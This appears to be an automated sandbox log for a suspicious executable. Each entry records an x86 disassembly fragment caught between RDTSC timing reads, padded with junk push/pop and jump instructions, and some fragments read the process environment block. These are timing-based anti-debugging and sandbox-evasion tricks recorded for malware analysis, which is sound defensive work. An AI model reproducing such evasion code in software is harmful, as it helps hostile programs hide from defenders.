Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 10017C0 second address: 10017D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCCh 0x00000009 jbe 00007F577C53EFC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 103C59B second address: 103C5B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F577C5415C6h 0x0000000f jng 00007F577C5415C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1043FA3 second address: 1043FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F577C53EFCFh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1043FBB second address: 1043FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F577C5415CCh 0x0000000e ja 00007F577C5415D2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1043FE2 second address: 1044008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F577C53EFCAh 0x0000000e jno 00007F577C53EFC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116523 second address: 111652B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111652B second address: 111653B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F577C53EFC6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11166AD second address: 11166D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F577C5415CAh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11166D3 second address: 11166D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11166D7 second address: 1116705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F577C5415D5h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jl 00007F577C5415CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116705 second address: 1116709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116A22 second address: 1116A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F577C5415CBh 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116A39 second address: 1116A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116BA4 second address: 1116BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CDh 0x00000007 jmp 00007F577C5415CAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F577C5415D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116BDA second address: 1116BE0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116D21 second address: 1116D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116D2D second address: 1116D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1116E70 second address: 1116E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 11188B9 second address: 11188BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111C73A second address: 111C73E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111C73E second address: 111C744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111CAD7 second address: 111CADD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111CADD second address: 111CAE2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111CD3C second address: 111CD81 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F577C5415CEh 0x00000017 nop 0x00000018 clc 0x00000019 push dword ptr [ebp+12A035BDh] 0x0000001f or dx, 2B31h 0x00000024 push FEAF09ECh 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F577C5415CFh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E5ED second address: 111E60C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C53EFD9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E60C second address: 111E612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E612 second address: 111E625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E1A9 second address: 111E1AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E1AF second address: 111E1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 111E1B9 second address: 111E1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1120105 second address: 112010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 112010A second address: 1120112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 1120112 second address: 1120116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743000B second address: 7430040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F577C5415D0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F577C5415CCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430040 second address: 7430045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430045 second address: 7430071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F577C5415CEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx esi, dx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430071 second address: 74300B8 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 55ECh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov di, E4D8h 0x0000000c popad 0x0000000d mov eax, dword ptr fs:[00000030h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx eax, di 0x00000019 pushfd 0x0000001a jmp 00007F577C53EFD5h 0x0000001f sbb cx, A476h 0x00000024 jmp 00007F577C53EFD1h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74300B8 second address: 74300BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74300BD second address: 7430115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F577C53EFCDh 0x0000000a and ecx, 6F8795D6h 0x00000010 jmp 00007F577C53EFD1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d mov cl, 06h 0x0000001f mov bx, 130Ch 0x00000023 popad 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F577C53EFCDh 0x0000002e jmp 00007F577C53EFCBh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430115 second address: 743011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743011A second address: 7430211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C53EFD5h 0x00000009 sub cl, 00000046h 0x0000000c jmp 00007F577C53EFD1h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebx 0x0000001a jmp 00007F577C53EFCCh 0x0000001f mov ebx, dword ptr [eax+10h] 0x00000022 pushad 0x00000023 call 00007F577C53EFCEh 0x00000028 mov edx, eax 0x0000002a pop eax 0x0000002b jmp 00007F577C53EFD7h 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F577C53EFD2h 0x0000003a jmp 00007F577C53EFD5h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007F577C53EFD0h 0x00000046 sub cx, 8708h 0x0000004b jmp 00007F577C53EFCBh 0x00000050 popfd 0x00000051 popad 0x00000052 jmp 00007F577C53EFD8h 0x00000057 popad 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov edx, esi 0x0000005e call 00007F577C53EFD8h 0x00000063 pop ecx 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430211 second address: 743023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F577C5415D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743023F second address: 74302CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C53EFD2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [770206ECh] 0x00000011 pushad 0x00000012 mov al, 67h 0x00000014 mov di, 601Eh 0x00000018 popad 0x00000019 test esi, esi 0x0000001b jmp 00007F577C53EFD5h 0x00000020 jne 00007F577C53FF30h 0x00000026 jmp 00007F577C53EFCEh 0x0000002b xchg eax, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, 30AA0030h 0x00000034 pushfd 0x00000035 jmp 00007F577C53EFD9h 0x0000003a adc eax, 7162E7B6h 0x00000040 jmp 00007F577C53EFD1h 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74302CC second address: 74302DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74302DC second address: 74302E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74302E0 second address: 7430306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F577C5415CEh 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F577C5415CAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430306 second address: 743030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743030A second address: 7430310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430310 second address: 7430316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430316 second address: 743031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743031A second address: 74303BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [76FF0B60h] 0x0000000e mov eax, 7571E5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F577C53EFD2h 0x0000001b or ah, FFFFFF98h 0x0000001e jmp 00007F577C53EFCBh 0x00000023 popfd 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 movzx esi, bx 0x0000002a popad 0x0000002b popad 0x0000002c push 00000044h 0x0000002e jmp 00007F577C53EFD7h 0x00000033 pop edi 0x00000034 jmp 00007F577C53EFD6h 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov bx, si 0x0000003e mov cx, 1DE9h 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 jmp 00007F577C53EFCEh 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e popad 0x0000004f xchg eax, edi 0x00000050 jmp 00007F577C53EFCEh 0x00000055 push dword ptr [eax] 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a mov ebx, 53660A00h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303BD second address: 74303C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303C2 second address: 74303C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303C8 second address: 74303CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303CC second address: 74303D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74303D0 second address: 7430405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f mov ah, 58h 0x00000011 mov cx, di 0x00000014 popad 0x00000015 push dword ptr [eax+18h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F577C5415D9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430405 second address: 743040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743040B second address: 7430411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430439 second address: 7430456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430456 second address: 7430492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C5415D7h 0x00000008 jmp 00007F577C5415D8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov esi, eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430492 second address: 7430496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430496 second address: 743049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743049A second address: 74304D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F577C53EFD8h 0x0000000c sub ax, E758h 0x00000011 jmp 00007F577C53EFCBh 0x00000016 popfd 0x00000017 popad 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, E446h 0x00000021 push edi 0x00000022 pop eax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74304D7 second address: 7430508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 7315h 0x00000007 call 00007F577C5415D2h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F57EC0B077Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F577C5415CCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430508 second address: 7430536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F577C53EFD7h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430536 second address: 7430576 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 91BCh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, al 0x00000010 pushfd 0x00000011 jmp 00007F577C5415D9h 0x00000016 adc cl, FFFFFFC6h 0x00000019 jmp 00007F577C5415D1h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430576 second address: 743057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743057C second address: 7430580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430580 second address: 74305E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F577C53EFD6h 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F577C53EFD0h 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e pushad 0x0000001f mov cx, 750Dh 0x00000023 mov esi, 386B5509h 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+4Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F577C53EFCBh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74305E3 second address: 7430628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c jmp 00007F577C5415CEh 0x00000011 mov eax, dword ptr [ebx+50h] 0x00000014 pushad 0x00000015 mov di, cx 0x00000018 mov si, B2C9h 0x0000001c popad 0x0000001d mov dword ptr [esi+14h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edx 0x00000024 pop ecx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430628 second address: 743066D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F577C53EFCEh 0x00000013 xor ecx, 62152978h 0x00000019 jmp 00007F577C53EFCBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743066D second address: 7430671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430671 second address: 7430692 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 693780CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+18h], eax 0x0000000d jmp 00007F577C53EFCEh 0x00000012 mov eax, dword ptr [ebx+58h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430692 second address: 7430696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430696 second address: 743071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bh, C1h 0x00000008 popad 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F577C53EFCEh 0x00000013 jmp 00007F577C53EFD5h 0x00000018 popfd 0x00000019 mov ah, 8Ah 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+5Ch] 0x0000001f jmp 00007F577C53EFD3h 0x00000024 mov dword ptr [esi+20h], eax 0x00000027 pushad 0x00000028 jmp 00007F577C53EFD4h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F577C53EFD0h 0x00000035 and ax, CA28h 0x0000003a jmp 00007F577C53EFCBh 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743071D second address: 743072D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0621031Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
